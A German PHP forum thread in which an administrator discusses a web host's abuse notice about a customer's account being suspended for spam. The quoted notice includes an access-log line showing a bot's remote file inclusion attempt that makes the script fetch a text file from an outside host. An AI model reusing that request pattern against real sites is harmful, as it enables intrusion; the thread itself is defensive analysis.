Merkwürdiges Security Issue

Sicheres php codieren.
Antworten
Benutzeravatar
Powie
Administrator
Beiträge: 7459
Registriert: 4. März 2003, 09:32
Wohnort: Ilmtal
Kontaktdaten:

Merkwürdiges Security Issue

Beitrag von Powie » 8. Juli 2010, 09:45

Ich möchte gern einmal eure Meinung hören zu dem folgenden Vorfall. Einer unserer Anwender hat eine Account Sperre seines Webspace hinnehmen müssen weil angeblich tausende Spam Mails verschickt wurden. Dazu gab es diese EMail des Webhosters, die ich beim ersten Lesen für vollkommenen Sinnlos halte:


[quote]In den access_log Ihres Accounts wurden folgende Einträge gefunden:

- - [05/Jul/2010:00:07:52 +0200] "GET /forum_d/edituser.php?boardid=http://amyru.h18.ru/images/cs.txt?
HTTP/1.1" 200 24187 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"


Folgende Skripte/Ordner wurden von uns per Chmod 000 gesperrt:

/tmp/.ICE

Bitte schalten Sie diese Skripte nicht einfach wieder frei, sondern prüfen mit
den Entwicklern, wie es zu diesen Sicherheitslücken innerhalb des Skriptes
kommen konnte. Ggf. verwenden Sie hier auch veralte Versionen mit bekannten
Sicherheitslücken.[/quote]

Dazu habe ich zwei Argumente:
1. Ein solcher Angriff auf die edituser.php führt zu nichts, da dort die boardid sowieso nicht verabreitet wird.
2. Die Datei /tmp/.ICE hat mit dem Webuser garnichts zu tun, die gehört im Original zum X System.....
3. Vergleichbare Anfragen finden sich in allen access_logs, auch in meinen eigenen, das sind Bots die das Internet scannen und versuchen Einbruchsstellen ausfindig zu machen.
*Never say Never* - [ Dropbox | Webspace ]

Benutzeravatar
Powie
Administrator
Beiträge: 7459
Registriert: 4. März 2003, 09:32
Wohnort: Ilmtal
Kontaktdaten:

Merkwürdiges Security Issue

Beitrag von Powie » 8. Juli 2010, 11:10

Ich habe mittlerweile das access_log aus dem Zeitraum im Zugriff. Die genannte Zeile aus dem access_log kommt genau einmal vor..... (!)
*Never say Never* - [ Dropbox | Webspace ]

adminfrank
Beiträge: 110
Registriert: 8. Oktober 2007, 14:45
Kontaktdaten:

Merkwürdiges Security Issue

Beitrag von adminfrank » 8. Juli 2010, 15:36

Gemerkt hab ich davon noch nichts, also bei mir wierden keine Mails versendet, das einzige was ich habe ist, das ich persönlich zig Spammails bekomme.

Benutzeravatar
Powie
Administrator
Beiträge: 7459
Registriert: 4. März 2003, 09:32
Wohnort: Ilmtal
Kontaktdaten:

Merkwürdiges Security Issue

Beitrag von Powie » 8. Juli 2010, 16:11

Spam bekämpft man mit Googlemail :-D
*Never say Never* - [ Dropbox | Webspace ]

raiser
Beiträge: 476
Registriert: 20. April 2002, 15:31
Kontaktdaten:

Merkwürdiges Security Issue

Beitrag von raiser » 8. Juli 2010, 22:05

Nö, den gebe ich nichts in die Hand...

;)
Wissen ist das einzige Gut, dass sich vermehrt, wenn man es teilt! (Marie von Ebner-Eschenbach)

Irren ist menschlich!

Wer andern eine Grube gräbt,
sollte darüber nachdenken,
ob sie tief genug ist!!!!

Kameradschaft ist, wenn der
Kamerad schafft !!!!

Antworten